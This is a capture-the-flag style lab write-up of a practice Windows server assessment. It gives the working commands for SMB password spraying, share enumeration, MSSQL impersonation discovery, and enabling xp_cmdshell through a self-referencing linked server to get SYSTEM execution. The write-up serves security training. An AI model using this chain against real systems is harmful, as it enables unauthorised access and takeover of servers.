Skill Assessment - Attacking Common Services
Summary
This Hard skill assessment targets an internal Windows server (WIN-HARD) that manages files and hosts a Microsoft SQL Server instance. The attack chains a series of misconfigurations: a weak SMB credential leads to file share access, a password reused in a share exposes a second user, and MSSQL impersonation privileges combined with a self-referencing linked server ultimately yield SYSTEM-level command execution via xp_cmdshell.
IP: 10.129.203.10
OS: Windows Server 2019 (Build 17763)
Difficulty: Hard
Key Skills: SMB Enumeration, Password Spraying, MSSQL Impersonation, Linked Server Abuse
Reconnaissance
The brief describes an internal server used to manage files and working material, running an unknown database. An Nmap scan confirms the exposed services:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ Target_Name: WIN-HARD (NetBIOS/DNS: WIN-HARD)
- 445 (SMB): File shares — first foothold for user/file enumeration.
- 1433 (MSSQL): SQL Server 2019 — the privilege-escalation surface.
- 3389 (RDP): Interactive access once valid credentials are found.
- Domain = WIN-HARD: Matches the hostname → standalone server, accounts are local (
--local-auth).
SMB Enumeration & Simon
Given the username simon, a password spray against SMB finds a valid credential. Note the (Guest) tag — the server has guest fallback enabled, so this needs verifying, but the credential turns out to be genuine:
netexec smb 10.129.203.10 -u simon -p pws.list --local-auth --ignore-pw-decoding
SMB 10.129.203.10 445 WIN-HARD [+] WIN-HARD\simon:li***ol (Guest)
With the password confirmed, enumerate the readable shares:
smbmap -u simon -p 'liverpool' -H 10.129.203.10
Disk Permissions Comment
---- ----------- -------
Home READ ONLY
IPC$ READ ONLY Remote IPC
The Home share contains department folders. Under IT/, each user has a personal directory:
smbclient //10.129.203.10/home -U simon
smb: \> ls
HR IT OPS Projects
smb: \IT\> ls
Fiona John Simon
smb: \IT\Simon\> ls
random.txt A 94
smb: \IT\john\> ls
information.txt A 101
notes.txt A 164
secrets.txt A 99
The file belonging to Simon is random.txt. More importantly, John's folder contains a secrets.txt — a strong signal for the next stage.
Password Discovery — Fiona
Enumerating the retrieved files (and continued share access) surfaces a password for the user fiona. Confirm it against SMB:
netexec smb 10.129.203.10 -u fiona -p creds.txt --local-auth
SMB 10.129.203.10 445 WIN-HARD [+] WIN-HARD\fiona:48Ns***Sl
MSSQL Impersonation
With Fiona's credentials we authenticate to MSSQL. The critical enumeration step is checking which logins the current user is allowed to impersonate:
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
name
-----
john
simon
Fiona can impersonate john. However, John alone cannot run xp_cmdshell directly on this instance — so we enumerate the registered linked servers:
SELECT srvname, isremote FROM sysservers;
srvname isremote
--------------------- --------
WINSRV02\SQLEXPRESS 1
LOCAL.TEST.LINKED.SRV 0
These are two different escalation paths. MSSQL refuses a linked-server call made while impersonating ("Linked servers cannot be used under impersonation without a mapping"). The self-referencing LOCAL.TEST.LINKED.SRV (isremote=0) is the interesting one — queries sent through it run in the link's own security context.
Linked Server & RCE
Sending a query through LOCAL.TEST.LINKED.SRV confirms the link executes as sysadmin:
EXECUTE('SELECT @@servername, @@version, system_user,
is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV];
-- is_srvrolemember returns 1 → sysadmin on the far side
xp_cmdshell is disabled by default, so enable it through the link first. Inner single quotes are doubled because the whole statement travels as a string:
EXEC ('sp_configure ''show advanced options'', 1') AT [LOCAL.TEST.LINKED.SRV];
EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV];
EXEC ('sp_configure ''xp_cmdshell'', 1') AT [LOCAL.TEST.LINKED.SRV];
EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV];
Now command execution works — and the context is nt authority\system:
EXEC ('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV];
output
-------------------
nt authority\system
With SYSTEM-level execution, the flag on the Administrator desktop is trivial to read:
EXEC ('xp_cmdshell ''dir C:\Users\Administrator\Desktop''') AT [LOCAL.TEST.LINKED.SRV];
Directory of C:\Users\Administrator\Desktop
04/21/2022 04:07 PM 27 flag.txt
The chain is complete: simon → SMB files → fiona → impersonate john → linked-server sysadmin → xp_cmdshell as SYSTEM. Reading flag.txt from the Administrator desktop finishes the assessment.
🎯 Key Takeaways
- Guest fallback: A
[+]tagged(Guest)is not proof of a valid credential — verify before trusting it. - Standalone vs domain: When the domain name equals the hostname, accounts are local — use
--local-auth. - MSSQL impersonation:
IMPERSONATEgrants are a direct privilege-escalation path; always enumerate them. - Linked servers: A self-referencing link can run as sysadmin. Impersonation and linked-server calls cannot be combined in one context.
- Quote escaping: Statements sent via
EXEC(...) AT [srv]need inner single quotes doubled (''). - xp_cmdshell as SYSTEM: The SQL service account is often highly privileged — enabling it can mean immediate SYSTEM.
Tools Used
nmap— service enumerationnetexec— SMB/MSSQL sprayingsmbmap/smbclient— share accessimpacket-mssqlclient— MSSQL interaction